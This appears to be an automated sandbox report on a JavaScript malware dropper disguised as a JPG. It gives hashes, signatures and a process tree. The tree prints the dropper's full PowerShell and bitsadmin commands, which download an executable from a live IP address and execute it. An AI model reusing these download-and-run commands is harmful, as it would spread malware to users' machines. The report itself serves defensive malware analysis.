Analysis
max time kernel: 122s
max time network: 123s
platform: windows7_x64
resource: win7-20240705-en
resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
submitted: 25-08-2024 16:40
Tasks
Static task: static1
Behavioral task: behavioral1
  Sample: c126d9b909d774a177d560de530aea04_JaffaCakes118.zip
  Resource: win7-20240704-en
Behavioral task: behavioral2
  Sample: c126d9b909d774a177d560de530aea04_JaffaCakes118.zip
  Resource: win10v2004-20240802-en
Behavioral task: behavioral3
  Sample: PIC176174.jpg.js
  Resource: win7-20240705-en
General
Target: PIC176174.jpg.js
Size: 650B
MD5: a7ab035cbabbaa850b95e1eb8c877789
SHA1: 1175c71d4e70591c3816292fd9107486a7fb3bbe
SHA256: a84be445b2a8be5ed37e7d23816293f15ba5acec72fde6e77d59db4832eace48
SHA512: 7189b836a35309cc29acadfb3ed9bb915db1adb47780b70c1ec44ab308d46eaebdc1ab1fae7a460d437f47fef781c0a4d7d9c4e025f7de6e0952b21d792c1854
Malware Config
Extracted URL: http://217.8.117.63/tspam.exe
Signatures
Blocklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid  | process
  6    | 2364 | powershell.exe
Download via BitsAdmin (1 TTP, 1 IoC)
Command and Scripting Interpreter: JavaScript (1 TTP)
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe
  pid  | process
  2364 | powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description              | pid  | process
  Token: SeDebugPrivilege  | 2364 | powershell.exe
Suspicious use of WriteProcessMemory (12 IoCs)
  Processes: wscript.exe, cmd.exe, cmd.exe
  description     | pid  | process      | target process
  wrote to memory of 2340 | 2500 | wscript.exe | cmd.exe (3 entries)
  wrote to memory of 2968 | 2500 | wscript.exe | cmd.exe (3 entries)
  wrote to memory of 2364 | 2340 | cmd.exe     | powershell.exe (3 entries)
  wrote to memory of 760  | 2968 | cmd.exe     | bitsadmin.exe (3 entries)
Processes
Level 1: C:\Windows\system32\wscript.exe (PID 2500)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\PIC176174.jpg.js
  Signatures: Suspicious use of WriteProcessMemory
  Level 2: C:\Windows\System32\cmd.exe (PID 2340)
    Command line: "C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'
    Signatures: Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2364)
      Command line: PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspam.exe','C:\Users\Admin\AppData\Local\Temp\394955.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\394955.exe'
      Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  Level 2: C:\Windows\System32\cmd.exe (PID 2968)
    Command line: "C:\Windows\System32\cmd.exe" /c bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe&start C:\Users\Admin\AppData\Local\Temp\558392.exe
    Signatures: Suspicious use of WriteProcessMemory
    Level 3: C:\Windows\system32\bitsadmin.exe (PID 760)
      Command line: bitsadmin /transfer twetaeihwuwe /download /priority high http://217.8.117.63/tspam.exe C:\Users\Admin\AppData\Local\Temp\558392.exe
      Signatures: Download via BitsAdmin